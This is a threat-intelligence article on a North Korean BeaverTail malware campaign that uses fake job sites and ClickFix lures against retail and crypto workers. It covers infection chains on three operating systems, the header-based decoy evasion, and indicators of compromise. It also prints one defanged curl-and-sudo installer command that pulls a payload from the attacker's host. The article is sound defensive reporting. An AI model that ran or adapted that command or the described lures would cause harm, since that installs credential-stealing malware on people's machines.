BeaverTail Variant via Malicious Repositories Targeting Retail Sector Organizations

A sophisticated North Korean nation-state threat actor campaign has emerged, distributing an evolved variant of the BeaverTail malware through deceptive fake hiring platforms and ClickFix social engineering tactics.

This latest campaign, active since May 2025, represents a significant tactical shift as threat actors expand beyond their traditional software developer targets to pursue marketing professionals, cryptocurrency traders, and retail sector personnel.

The malware distribution infrastructure centers around a fraudulent hiring website hosted at businesshire[.]top, masquerading as a legitimate recruitment platform.

The site offers positions including cryptocurrency trader roles at four web3 organizations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer.

When job seekers attempt to record mandatory video responses during the fake application process, they encounter fabricated technical errors requiring them to execute malicious system commands as troubleshooting steps.

GitLab analysts identified this campaign through infrastructure analysis that revealed the threat actor’s backend service hosted at nvidiasdk.fly[.]dev remains active as of publication.

The campaign demonstrates notable operational refinements, including the compilation of BeaverTail into standalone executables rather than relying on JavaScript interpreters, enabling the malware to function on systems without standard development tools typically found on non-technical users’ machines.

The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure.

The malicious service employs dynamic user agent header verification, responding with legitimate decoy payloads when accessed without specific numeric headers.

For example, requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables, while authentic infection attempts using headers like “203” trigger the deployment of actual BeaverTail payloads.

Technical Infection Chain Analysis

The BeaverTail infection mechanism varies significantly across operating systems, demonstrating the threat actor’s technical sophistication and commitment to cross-platform targeting.

On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg, which contains no payload data but executes a malicious preinstall script.

This script attempts to exfiltrate stored passwords from the non-standard ~/.myvars file location before downloading additional components from a GitHub repository hosted at /RominaMabelRamirez/dify.

The infection chain proceeds through the execution of downx64.sh, which retrieves two unsigned Mach-O binaries: x64nvidia containing the stripped-down BeaverTail variant, and payuniversal2, a PyInstaller-compiled version of InvisibleFerret.

The malware exhibits intelligent redundancy mechanisms, executing the InvisibleFerret binary only when Python 3 is unavailable at common installation locations or when BeaverTail execution fails to create the expected ~/.npc entry point file within ten seconds.

curl - k - A 204 - o /var/tmp/ nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer - pkg /var/tmp/nvidia[.]pkg - target /

Windows infections follow a different trajectory, with the ClickFix command downloading nvidia.tar.gz containing multiple components including a renamed 7zip executable and a VisualBasic launcher script.

The update.vbs script performs dual functions: extracting password-protected Python dependencies to a hidden .pyp directory using the hardcoded password “ppp,” and launching the primary nvidiasdk[.]exe executable containing the compiled BeaverTail variant.

Linux systems receive the most streamlined infection vector, with malicious scripts delivered directly through wget and piped into bash execution.

The script installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail functionally identical to the compiled versions deployed on other platforms.

This variant demonstrates reduced complexity compared to previous BeaverTail iterations, targeting only eight browser extensions rather than the typical 22, and omitting dedicated data extraction functions for browsers beyond Chrome.

The simplified codebase reduces overall malware size by approximately one-third while maintaining core credential stealing and cryptocurrency wallet targeting capabilities.

Command and control communications utilize the IP address 172.86.93[.]139 with “tttttt” serving as the campaign identifier across all infected systems.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free